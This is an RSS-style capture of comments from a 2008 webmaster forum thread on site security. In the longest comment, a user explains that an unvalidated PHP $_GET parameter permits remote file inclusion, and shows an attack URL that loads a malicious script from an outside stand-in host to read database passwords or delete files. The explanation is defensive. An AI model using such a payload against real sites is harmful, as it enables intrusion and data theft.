https://www.webmaster-forums.net/crss/node/1040559 en https://www.webmaster-forums.net/server-management/site-security#comment-1228125 <p>unfortunately there is no unique secure thing to procect themselves from the hackers.</p> Mon, 28 Jan 2008 14:17:00 +0000 akopayan comment 1228125 at https://www.webmaster-forums.net https://www.webmaster-forums.net/server-management/site-security#comment-1228022 <p>I think it can be if the hacker is experienced enough.</p> Tue, 22 Jan 2008 15:35:42 +0000 knorr comment 1228022 at https://www.webmaster-forums.net https://www.webmaster-forums.net/server-management/site-security#comment-1227992 <p>The way you have it set up, yes, it is possible to do some malicious things. I don't think that specific log entry was the culprit. I think your site was a victim of remote code execution.</p> <p>The problem is that you're assuming that the user input is going to be valid, so you don't verify it. That $_GET input is actually easily changeable. If I had to get into a site that's setup like that, I would put a malicious PHP script on my server, let's say at <a href="http://www.example.com/bad/script.php" title="http://www.example.com/bad/script.php">http://www.example.com/bad/script.php</a>. Then, I would go to your website and call up <a href="http://yoursite.com/index.php?p=http://www.example.com/bad/script.php" title="http://yoursite.com/index.php?p=http://www.example.com/bad/script.php">http://yoursite.com/index.php?p=http://www.example.com/bad/script.php</a></p> <p>The PHP script that's being loaded from my server, could have any dangerous command that could scan your PHP code for database passwords or simply (but devastatingly) delete all your files.</p> Mon, 21 Jan 2008 15:05:10 +0000 pr0gr4mm3r comment 1227992 at https://www.webmaster-forums.net